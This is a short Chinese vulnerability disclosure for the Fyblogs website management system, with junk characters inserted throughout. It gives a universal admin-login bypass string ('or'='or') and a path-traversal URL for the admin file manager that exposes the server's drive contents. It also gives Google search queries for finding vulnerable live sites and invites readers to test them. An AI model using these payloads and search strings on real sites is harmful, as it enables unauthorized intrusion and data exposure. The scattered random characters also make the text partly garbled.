漏洞类型: 未授权访问/权限绕过! x8 D) p" q% Z' F3 o
8 _7 H: u+ T8 E; C# [- [ u简要描述:
+ X3 t4 B% M( Y! u2 a
9 E' k2 T8 K! Y3 @5 K% C, X* HFyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!+ \& u) J/ W2 `" |0 e: J2 u' ~$ p5 j
) h+ {3 A7 g$ g( n) ?9 |
详细说明:: w" o' }1 o4 M, v
6 u4 }" [: Z7 C后台万能密码 'or'='or'
" |" U4 q6 A8 q5 h9 O* j9 b1 F后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
% d2 V5 l+ b8 Hadmin/uploadfile.asp?currentFolder=/upfiles/../* `# T- J1 G0 s4 E, H. w/ n
7 K7 t2 Q! k( c漏洞证明:& H0 v/ A8 a; z9 ]9 i# Q
* l) _' ~% l0 E" @/ \
谷歌:inurl:type.asp?id=1 新闻中心1 q: Y6 P5 x j8 y! t8 u& U5 o
或者 :inurl:download_ok.asp?& F, l+ V& j1 F: Y& Z B/ C/ i- u
5 p9 f) w4 o0 J) Y3 E6 C, w, z
可以测试
) O3 I1 N# S4 F
K1 w8 A; K1 z* `" I: B! K$ \
+ x$ e `& k. r9 z4 ^& d. B |